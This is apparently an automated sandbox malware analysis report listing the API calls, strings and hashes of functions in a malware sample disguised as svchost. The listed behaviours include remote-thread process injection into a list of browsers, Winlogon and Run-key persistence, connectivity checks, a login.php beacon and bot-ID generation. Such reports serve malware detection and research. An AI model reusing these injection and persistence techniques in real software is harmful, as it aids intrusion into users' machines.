GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401C28
VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 00401C6F
WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401C91
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00401CBD
memcpy.MSVCRT ref: 00401CD8
WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 00401CF3
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00401D01
WriteProcessMemory.KERNEL32(00000000,?,00406400,00052A00,?), ref: 00401D34
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401D44
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401D56
GetHandleInformation.KERNEL32(00000000), ref: 00401D6E
CloseHandle.KERNEL32(00000000), ref: 00401D7F
RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401DA0
GetHandleInformation.KERNEL32(00000000), ref: 00401DBC
CloseHandle.KERNEL32(00000000), ref: 00401DCD

Strings

kernel32.dll, xrefs: 00401BCF, 00401C0C
IsWow64Process, xrefs: 00401BEB, 00401C22

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheChangeCurrentErrorFindFlushFreeInstructionLastNotificationOpenRemoteSleepSwitchUsermemcpymemset
String ID: IsWow64Process$kernel32.dll
API String ID: 2373081918-3024904723
Opcode ID: ba5e8482ce6558dcd48eb70727eb2832cdeee386e3baf9961ddfede8c17bb47e
Instruction ID: 1cc1a5b9d3a24803e7d074aebc255e1873ec8508329ddbed26f29eb15fe00603
Opcode Fuzzy Hash: ba5e8482ce6558dcd48eb70727eb2832cdeee386e3baf9961ddfede8c17bb47e
Instruction Fuzzy Hash: 8E71A2B1640215ABE710DF94DD89FAF77B8AF84701F144029FA01B72D1D7B8A941C7A8

Function 02D248D0 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 211
injectionlibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D252D0: memset.MSVCRT ref: 02D252F6
Part of subcall function 02D252D0: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02D25307
Part of subcall function 02D252D0: GetLastError.KERNEL32 ref: 02D25310
Part of subcall function 02D252D0: SwitchToThread.KERNEL32 ref: 02D2531F
Part of subcall function 02D252D0: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02D25328
Part of subcall function 02D252D0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D25348
Part of subcall function 02D252D0: CloseHandle.KERNEL32(00000000), ref: 02D25359

Sleep.KERNEL32(00000064,00000000,00000000,?,?), ref: 02D2490F
OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,?,?), ref: 02D2492E
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02D2494D
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02D24963
GetCurrentProcess.KERNEL32(00000000), ref: 02D2496F
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02D2498A
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02D2499A
VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 02D249D4
WriteProcessMemory.KERNEL32(00000000,00000000,?,?,?), ref: 02D249F5
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02D24A21
memcpy.MSVCRT ref: 02D24A39
WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,00000004,?,?,00003000,00000004), ref: 02D24A54
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00003000,00000004), ref: 02D24A62
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 02D24A8A
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D24A9C
GetHandleInformation.KERNEL32(00000000,?), ref: 02D24AB4
CloseHandle.KERNEL32(00000000), ref: 02D24AC5
RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D24AE6
GetHandleInformation.KERNEL32(00000000,?), ref: 02D24B02
CloseHandle.KERNEL32(00000000), ref: 02D24B13

Strings

IsWow64Process, xrefs: 02D2495D, 02D24994
kernel32.dll, xrefs: 02D24941, 02D2497E

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$CreateProcess$CloseInformationThreadVirtual$AddressAllocMemoryModuleProcSnapshotToolhelp32Write$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
String ID: IsWow64Process$kernel32.dll
API String ID: 2650560580-3024904723
Opcode ID: cfb202bba02542363fa1e7a622e2eb39078fe7e62c6d42ddd41006a77ad49f3a
Instruction ID: 62589d7ee92364895b34ffb043f7310303b85d77c10ea096da04c2df4698b551
Opcode Fuzzy Hash: cfb202bba02542363fa1e7a622e2eb39078fe7e62c6d42ddd41006a77ad49f3a
Instruction Fuzzy Hash: 2C61A179A40314ABEB10CF64DC89FAA77A8EF95708F548409FD09AB380DBB4DD54CB64

Function 02D14AF0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 87networkstringCOMMON

Download Yara Rule

APIs

IsNetworkAlive.SENSAPI(02D06BEE,00000000), ref: 02D14B03
IsUserAnAdmin.SHELL32 ref: 02D14B11
DnsFlushResolverCache.DNSAPI ref: 02D14B1B
memset.MSVCRT ref: 02D14B38
lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,75920F10), ref: 02D14B57
StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02D14B70
InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D14B83
memset.MSVCRT ref: 02D14B9C
lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,75920F10), ref: 02D14BB5
StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02D14BC8
InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D14BD5

Strings

www.microsoft.com, xrefs: 02D14BBC
http://, xrefs: 02D14B4B, 02D14BA9
www.bing.com, xrefs: 02D14B64

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CheckConnectionInternetlstrcpynmemset$AdminAliveCacheFlushNetworkResolverUser
String ID: http://$www.bing.com$www.microsoft.com
API String ID: 1656757314-3977723178
Opcode ID: a998fb2afec49b63753b9f37aba7eb954b3d2e996f2e6a1fde70d975aff6f920
Instruction ID: 53b1d089fe6ea50ba22bdbe8c81e6ca54afe4dce9d94d7de903f61fb7503d05b
Opcode Fuzzy Hash: a998fb2afec49b63753b9f37aba7eb954b3d2e996f2e6a1fde70d975aff6f920
Instruction Fuzzy Hash: 4F212B7AE4431877E720DAA5BC81FCA77ACDB54710F400585F688E6280DEF0AEC48B90

Function 02D17300 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 89memoryprocessCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D17314
Process32First.KERNEL32(00000000,?), ref: 02D17339
GetCurrentProcessId.KERNEL32(?,00000000), ref: 02D1735D
StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02D17377
EnterCriticalSection.KERNEL32(02D4FB80,?,00000000), ref: 02D1739B
GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02D173A1
HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02D173A8
LeaveCriticalSection.KERNEL32(02D4FB80,?,00000000), ref: 02D173D7

Part of subcall function 02D24450: OpenProcess.KERNEL32(00000400,00000000,00000000,7591F550,00000000,76EDC3F0), ref: 02D24465
Part of subcall function 02D24450: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,?,?,?,02D153C3), ref: 02D2447C
Part of subcall function 02D24450: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02D2449A
Part of subcall function 02D24450: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02D153C3), ref: 02D244B2
Part of subcall function 02D24450: GetHandleInformation.KERNEL32(?,00000000), ref: 02D2450B
Part of subcall function 02D24450: FindCloseChangeNotification.KERNEL32(?), ref: 02D2451C
Part of subcall function 02D24450: GetHandleInformation.KERNEL32(00000000,?), ref: 02D2452E
Part of subcall function 02D24450: CloseHandle.KERNEL32(00000000), ref: 02D2453F

Process32Next.KERNEL32(00000000,00000128), ref: 02D173EB
GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02D17405
CloseHandle.KERNEL32(00000000,?,00000000), ref: 02D17416

Strings

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex, xrefs: 02D17372

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$InformationProcess$Close$CriticalHeapOpenProcess32SectionToken$AllocChangeCharCreateCurrentEnterFindFirstLeaveNextNotificationSnapshotToolhelp32Upper
String ID: iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex
API String ID: 3743708096-4199822264
Opcode ID: f6f04134522824db804c22891aa0255bc07f856ca5f21d94291aa3876ffdec6e
Instruction ID: 8f106cb2208b0bc3eacfc4288698361be66cb8556c3fc1525f854b62a11f4802
Opcode Fuzzy Hash: f6f04134522824db804c22891aa0255bc07f856ca5f21d94291aa3876ffdec6e
Instruction Fuzzy Hash: F6318074D41215AFEB209F65E848BAEBBF8EF54754F504498E889D2340DB70AE54CFA0

Function 00403870 Relevance: 19.3, APIs: 4, Strings: 7, Instructions: 48registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,y9@), ref: 0040389C
RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 004038C1
RegCloseKey.KERNEL32(y9@), ref: 004038CF
RegCloseKey.ADVAPI32(y9@), ref: 004038DF

Strings

SystemBiosVersion, xrefs: 004038B7
E, xrefs: 004038EE
U, xrefs: 00403900
Q, xrefs: 004038E5
y9@, xrefs: 00403879, 004038DB, 004038CB, 0040387C, 004038CE, 004038DE
M, xrefs: 004038F7
HARDWARE\DESCRIPTION\System, xrefs: 00403884

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Close$OpenQueryValue
String ID: E$HARDWARE\DESCRIPTION\System$M$Q$SystemBiosVersion$U$y9@
API String ID: 1607946009-2685269968
Opcode ID: d1a36d96073f5a746890f6a5e71d9fcf43d2de7dda4d0654719f46e6941f7b17
Instruction ID: a73e17f2ece4285d148bbbe7d21167b22b4148350c2fc20c0d473cf4689022c2
Opcode Fuzzy Hash: d1a36d96073f5a746890f6a5e71d9fcf43d2de7dda4d0654719f46e6941f7b17
Instruction Fuzzy Hash: 951165F2E00208FAEB20DF90DC45BAA7BB89B45315F1081EAE708751C1D7B86A448F5D

Function 028C1360 Relevance: 4.7, APIs: 3, Instructions: 233librarymemoryloaderCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,61FF864A), ref: 028C1435
LoadLibraryExA.KERNEL32(?,00000000,00000000,00000000,0AFB4677), ref: 028C14F5
GetProcAddress.KERNEL32(00000000,00000000,00000000,180E1688), ref: 028C154C

Memory Dump Source

Source File: 00000002.00000002.3272240736.00000000028C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_28c0000_svchost.jbxd

Yara matches

Similarity

API ID: AddressAllocLibraryLoadProcVirtual
String ID:
API String ID: 4074058790-0
Opcode ID: aa7ce5a238270ceac95f37866199dfe78f7af4c79aa13279955b4abe68ef9424
Instruction ID: 1afdac3fb950e88f9e156eab60afd9960b8a15c4c4b8e9a47c98aff7b5bec377
Opcode Fuzzy Hash: aa7ce5a238270ceac95f37866199dfe78f7af4c79aa13279955b4abe68ef9424
Instruction Fuzzy Hash: 64813C79D00619AFCB10DFA8C888BAEB7B6AF88754F254559E808F7305D734E901CF95

Function 02D17820 Relevance: 63.3, APIs: 32, Strings: 4, Instructions: 276
memoryregistrysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe), ref: 02D1784E
GetProcessHeap.KERNEL32(00000008,00000110), ref: 02D17863
HeapAlloc.KERNEL32(00000000), ref: 02D17870
memset.MSVCRT ref: 02D17887
GetShortPathNameA.KERNEL32(C:\Windows\apppatch\svchost.exe,00000000,00000104), ref: 02D1789A
RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?), ref: 02D178B5
RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02D178D3
GetProcessHeap.KERNEL32(00000008,-00000010), ref: 02D178F4
HeapAlloc.KERNEL32(00000000), ref: 02D178FB
memset.MSVCRT ref: 02D1790B
RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02D17925
StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02D17931
RegSetValueExA.KERNEL32(?,userinit,00000000,00000001,00000000,00000002), ref: 02D179D0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D179E2
HeapValidate.KERNEL32(00000000), ref: 02D179E5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D179F2
HeapFree.KERNEL32(00000000), ref: 02D179F5
RegFlushKey.ADVAPI32(?), ref: 02D179FF
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F013F,?), ref: 02D17A20
RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,00000000,00000002), ref: 02D17A49
RegFlushKey.ADVAPI32(?), ref: 02D17A53
RegCloseKey.KERNEL32(?), ref: 02D17A5D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D17A6C
HeapValidate.KERNEL32(00000000), ref: 02D17A6F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D17A7C
HeapFree.KERNEL32(00000000), ref: 02D17A7F
IsUserAnAdmin.SHELL32 ref: 02D17A85
RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,?), ref: 02D17ABB
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D17ACA
RegNotifyChangeKeyValue.KERNEL32(?,00000000,0000000F,00000000,00000001), ref: 02D17AE7
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D17AF3
RegNotifyChangeKeyValue.ADVAPI32(?,00000000,0000000F,00000000,00000001), ref: 02D17B16

Strings

software\microsoft\windows\currentversion\run, xrefs: 02D17A16, 02D17AB1
C:\Windows\apppatch\svchost.exe, xrefs: 02D17826, 02D17849, 02D17895, 02D1792B, 02D17B01
userinit, xrefs: 02D178CD, 02D1791F, 02D179CA, 02D17A43
software\microsoft\windows nt\currentversion\winlogon, xrefs: 02D178AB, 02D17A9A

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$ProcessValue$Open$AllocChangeFlushFreeNotifyPathQueryValidatememset$AdminCloseCreateEventExistsFileNameObjectShortSingleUserWait
String ID: C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
API String ID: 2447656991-2103896814
Opcode ID: 804803d83baa389672c9a2aa0659d0ece594446c87968725a4f2f9fafc2608d9
Instruction ID: db576244869007a9b68cd098162378d4c8d5bfd84cf73f88ee4afddffe64f113
Opcode Fuzzy Hash: 804803d83baa389672c9a2aa0659d0ece594446c87968725a4f2f9fafc2608d9
Instruction Fuzzy Hash: 1081FB78A80305BBFB208F64BC89FAAB7A9EF54B04F504504F945A7394DBB09D04C7A0

Function 02D063B0 Relevance: 61.6, APIs: 29, Strings: 6, Instructions: 303
memorynetworkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02D063D8
DnsFlushResolverCache.DNSAPI ref: 02D063FC
gethostbyname.WS2_32(02D06C17), ref: 02D06406
GetTempPathA.KERNEL32(00000104,?), ref: 02D06420
GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02D06438
calloc.MSVCRT ref: 02D064D6
exit.MSVCRT ref: 02D064E5
calloc.MSVCRT ref: 02D064EE
exit.MSVCRT ref: 02D064F8
calloc.MSVCRT ref: 02D06516
exit.MSVCRT ref: 02D06522
calloc.MSVCRT ref: 02D0652B
exit.MSVCRT ref: 02D06535
calloc.MSVCRT ref: 02D06553
exit.MSVCRT ref: 02D06560
calloc.MSVCRT ref: 02D0656A
exit.MSVCRT ref: 02D06575

Part of subcall function 02D01970: free.MSVCRT(00000000,00000000,00000000,00000001,?,02D066C8,?), ref: 02D019A7
Part of subcall function 02D01970: free.MSVCRT(00000000,00000000,00000000,00000001,?,02D066C8,?), ref: 02D019BB

calloc.MSVCRT ref: 02D06598
exit.MSVCRT ref: 02D065A5
calloc.MSVCRT ref: 02D065AF
exit.MSVCRT ref: 02D065BE
_strrev.MSVCRT ref: 02D06628
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?), ref: 02D066EF
HeapValidate.KERNEL32(00000000), ref: 02D066F2
GetProcessHeap.KERNEL32(00000000,?), ref: 02D066FF
RtlFreeHeap.NTDLL(00000000), ref: 02D06702
PathFileExistsA.SHLWAPI(?), ref: 02D0670F
SetFileAttributesA.KERNEL32(?,00000000), ref: 02D06722
DeleteFileA.KERNEL32(?), ref: 02D0672F

Strings

/login.php, xrefs: 02D06475, 02D06499
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02D06454
!verif, xrefs: 02D063DD
6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9, xrefs: 02D065CC
10001, xrefs: 02D065E9
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02D0645D, 02D0646D, 02D06491

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: callocexit$FileHeap$PathProcessTempfree$AttributesCacheDeleteExistsFlushFreeNameResolverValidate_strrevgethostbynamememset
String ID: !verif$/login.php$10001$6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
API String ID: 3012421807-801546749
Opcode ID: 24bcd9ce15dc69fcb5fab0348a6357fd2d0ba895f23fb43b5bc216cc2e1c60f3
Instruction ID: d75e90bc1525b5feab93963a02bed9b90f78590112408ee6168fa718fd1a60ce
Opcode Fuzzy Hash: 24bcd9ce15dc69fcb5fab0348a6357fd2d0ba895f23fb43b5bc216cc2e1c60f3
Instruction Fuzzy Hash: 36B1F475A40215ABEB209FA09CC4BAE7BBCAF45700F444499FA45AB3D0D7B4DE54CBE0

Function 02D03220 Relevance: 49.2, APIs: 19, Strings: 9, Instructions: 185
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02D03246

Part of subcall function 02D24C00: memset.MSVCRT ref: 02D24C33
Part of subcall function 02D24C00: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02D24C42
Part of subcall function 02D24C00: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02D24C49
Part of subcall function 02D24C00: memset.MSVCRT ref: 02D24C61
Part of subcall function 02D24C00: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02D24C78
Part of subcall function 02D24C00: GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02D24C7E
Part of subcall function 02D24C00: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02D24C9F
Part of subcall function 02D24C00: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000), ref: 02D24CC6
Part of subcall function 02D24C00: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000), ref: 02D24CDA

Part of subcall function 02D24D00: memset.MSVCRT ref: 02D24D34
Part of subcall function 02D24D00: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02D24D43
Part of subcall function 02D24D00: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02D24D4A
Part of subcall function 02D24D00: memset.MSVCRT ref: 02D24D62
Part of subcall function 02D24D00: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02D24D79
Part of subcall function 02D24D00: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02D24D7F
Part of subcall function 02D24D00: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02D24DA0
Part of subcall function 02D24D00: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02D24DC7
Part of subcall function 02D24D00: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02D24DDB

GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,76EDC3F0), ref: 02D03284
PathAddBackslashA.SHLWAPI(?,?,?,76EDC3F0), ref: 02D03291
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,76EDC3F0), ref: 02D032A8
RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00000101,?,?,?,76EDC3F0), ref: 02D032CE
RegQueryValueExA.KERNEL32(?,InstallDate,00000000,?,?,?,?,?,76EDC3F0), ref: 02D032EF
RegCloseKey.ADVAPI32(?,?,?,76EDC3F0), ref: 02D032F9
CharUpperA.USER32(00000000,?,?,76EDC3F0), ref: 02D0331F
CharUpperA.USER32(00000000,?,?,?,76EDC3F0), ref: 02D03328
_snprintf.MSVCRT ref: 02D03341
_snprintf.MSVCRT ref: 02D0339F
GetProcessHeap.KERNEL32(00000000,00000000,?,?,76EDC3F0), ref: 02D033CE
HeapValidate.KERNEL32(00000000,?,?,76EDC3F0), ref: 02D033D7
GetProcessHeap.KERNEL32(00000000,02D168CF,?,?,76EDC3F0), ref: 02D033E3
HeapFree.KERNEL32(00000000,?,?,76EDC3F0), ref: 02D033E6
GetProcessHeap.KERNEL32(00000000,?,?,?,76EDC3F0), ref: 02D033F6
HeapValidate.KERNEL32(00000000,?,?,76EDC3F0), ref: 02D033F9
GetProcessHeap.KERNEL32(00000000,?,?,?,76EDC3F0), ref: 02D03405
HeapFree.KERNEL32(00000000,?,?,76EDC3F0), ref: 02D03408

Strings

%s!%s!%08X, xrefs: 02D03332
%53%59%53%54%45%4D%21%32%31%36%30%34%31%21%33%38%34%32%35%41%41%43, xrefs: 02D03360, 02D03375
InstallDate, xrefs: 02D032E9
%02X, xrefs: 02D03391
SystemDrive, xrefs: 02D0327F
\t, xrefs: 02D03291
SYSTEM!216041!38425AAC, xrefs: 02D03238, 02D0333C, 02D03343, 02D033A1
SYSTEM, xrefs: 02D03317, 02D03331
Software\Microsoft\Windows NT\CurrentVersion, xrefs: 02D032C4

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$memset$Name$CharComputerErrorFreeLastUpperUserValidate_snprintflstrcpyn$AllocAllocateBackslashCloseEnvironmentInformationOpenPathQueryValueVariableVolume
String ID: %02X$%53%59%53%54%45%4D%21%32%31%36%30%34%31%21%33%38%34%32%35%41%41%43$%s!%s!%08X$InstallDate$SYSTEM$SYSTEM!216041!38425AAC$Software\Microsoft\Windows NT\CurrentVersion$SystemDrive$\t
API String ID: 3299431409-763849823
Opcode ID: b2e47bcdf0a7cd1ed0ed97d8ff13f70e6c87b903be8bd5057aa567972ecd74fa
Instruction ID: c0ee70dfd6423ebce0e1944a7c1ca5d46dde6a49f38a76449194f5f730c81e89
Opcode Fuzzy Hash: b2e47bcdf0a7cd1ed0ed97d8ff13f70e6c87b903be8bd5057aa567972ecd74fa
Instruction Fuzzy Hash: 6D51C575E00215ABEB109FA9ACC9FAF7BE8EB95700F444595FA45D7380DA709D04CBA0

Function 004021B0 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 81
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 004022F3
DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402323
CloseHandle.KERNEL32(00000000), ref: 0040232A

Strings

d, xrefs: 00402253
m, xrefs: 004022CD
T, xrefs: 004022AA
g, xrefs: 00402279
", xrefs: 0040225A
S, xrefs: 00402295
